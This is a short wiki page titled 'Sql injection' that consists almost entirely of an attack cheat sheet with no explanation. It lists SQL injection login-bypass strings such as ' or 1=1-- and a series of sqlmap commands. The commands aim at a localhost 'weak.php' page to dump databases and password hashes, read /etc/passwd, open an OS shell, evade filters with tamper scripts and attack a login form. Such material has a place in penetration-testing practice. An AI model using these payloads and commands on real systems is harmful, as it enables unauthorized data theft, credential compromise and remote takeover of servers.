Sql injection

From Server STB
Revision as of 07:51, 15 July 2024 by Admin (talk | contribs)
Jump to navigation Jump to search 
 or 1=1--
 " or 1=1--
 or 0=0#
 " or 0=0#
 ' or '0'='0
 " or "1"="1
 ' or 1=1--
 ' or = 0=0#
 or 1=1--
 ') or ('a'='a
 ") or ("a"="a
 tes " or "a"="a
 tes' or 'a'='a
 tes") or ("a"="a
 tes') or ('a'='a
 '="or'



 command :
 python ./sqlmap.py -u "http://localhost/weak.php?id=10" --dbs
 python sqlmap.py -u "http://localhost/weak.php?id=10" -b
 python sqlmap.py -u "http://localhost/weak.php?id=10" --users --passwords --privileges --roles --threads=10
 python sqlmap.py -u "http://localhost/weak.php?id=10" --current-user --is-dba --current-db --hostname --threads=10
 python sqlmap.py -u "http://localhost/weak.php?id=10" --file-read=/etc/passwd --threads=10
 C:\xampp\htdocs
 /var/www/html/
 python sqlmap.py -u "http://localhost/weak.php?id=10" --sql-query="select now();"
 python sqlmap.py -u "http://localhost/weak.php?id=10" --os-shell
 python sqlmap.py -u "http://localhost/weak.php?id=10" --level=3 --risk=2 --cookie="PHPSESSID:1r4fk7m10s3sj0nkbgdu1a48v0" --batch -v2 -o --keep-alive --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 
 Firefox/60.0" --no-cast --no-escape --tamper="space2comment,between"
 python sqlmap.py -u 'http://alamatwebsite/login.php'--method POST --data "username=user&password=pass"
Retrieved from "http://wiki.serverstb.com/index.php?title=Sql_injection&oldid=808"